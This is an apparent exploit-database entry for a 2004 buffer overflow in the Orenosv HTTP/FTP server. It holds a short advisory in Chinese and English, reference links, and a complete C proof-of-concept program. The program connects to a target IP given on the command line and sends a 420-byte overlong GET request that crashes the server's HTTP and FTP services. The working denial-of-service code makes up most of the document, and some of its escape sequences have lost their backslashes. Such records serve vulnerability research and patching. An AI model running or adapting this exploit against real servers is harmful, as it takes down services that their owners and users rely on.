https://www.exploit-db.com/exploits/24145
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200405-062

Orenosv是一款集成HTTP/FTP/FTPS的服务程序。Orenosv在处理超长HTTPGET请求时缺少充分边界缓冲区检查，远程攻击者可以利用这个漏对服务进行缓冲区溢出攻击。提交包含420字节的HTTPGET请求给Orenosv程序，可导致HTTP和FTP服务停止响应。精心构建提交数据可能以进程权限在系统上执行任意指令。

source: http://www.securityfocus.com/bid/10420/info

Orenosv HTTP/FTP server is prone to a denial of service vulnerability that may occur when an overly long HTTP GET request is sent to the server. When the malicious request is handled, it is reported that both the HTTP and FTP daemons will stop responding. 

/****************************/
   PoC to crash the server
/****************************/

/* Orenosv HTTP/FTP Server Denial Of Service

   Version:
   orenosv059f

   Vendor:
   http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html

   Coded and Discovered by:
   badpack3t <[email protected]>
   .:sp research labs:.
   www.security-protocols.com
   5.25.2004
 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

/* 420 A's - looks ugly but owell */
"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0rnrn";

int main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent  *pTarget;
        struct sockaddr_in      sock;
        char *target;
        int port,bufsize;
        SOCKET mysocket;

        if (argc < 2)
        {
                printf("Orenosv HTTP/FTP Server DoS by badpack3trnrn", argv[0]);
                printf("Usage:rn %s <targetip> [targetport] (default is 9999)rnrn", argv[0]);
                printf("www.security-protocols.comrnrn", argv[0]);
                exit(1);
        }

        wVersionRequested = MAKEWORD(1, 1);
        if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

        target = argv[1];
        port = 9999;

        if (argc >= 3) port = atoi(argv[2]);
        bufsize = 1024;
        if (argc >= 4) bufsize = atoi(argv[3]);

        mysocket = socket(AF_INET, SOCK_STREAM, 0);
        if(mysocket==INVALID_SOCKET)
        {
                printf("Socket error!rn");
                exit(1);
        }

        printf("Resolving Hostnames...n");
        if ((pTarget = gethostbyname(target)) == NULL)
        {
                printf("Resolve of %s failedn", argv[1]);
                exit(1);
        }

        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons((USHORT)port);

        printf("Connecting...n");
        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
        {
                printf("Couldn't connect to host.n");
                exit(1);
        }

        printf("Connected!...n");
        printf("Sending Payload...n");
        if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
        {
                printf("Error Sending the Exploit Payloadrn");
                closesocket(mysocket);
                exit(1);
        }

        printf("Payload has been sent! Check if the webserver is dead.rn");
        closesocket(mysocket);
        WSACleanup();
        return 0;
}

来源:XF
名称:orenosv-http-get-dos(16250)
链接:http://xforce.iss.net/xforce/xfdb/16250
来源:BID
名称:10420
链接:http://www.securityfocus.com/bid/10420
来源:OSVDB
名称:6419
链接:http://www.osvdb.org/6419
来源:SECUNIA
名称:11706
链接:http://secunia.com/advisories/11706
来源:BUGTRAQ
名称:20040526OrenosvHTTP/FTPServerDenialOfService
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108559623703422&w;=2
来源:hp.vector.co.jp
链接:http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html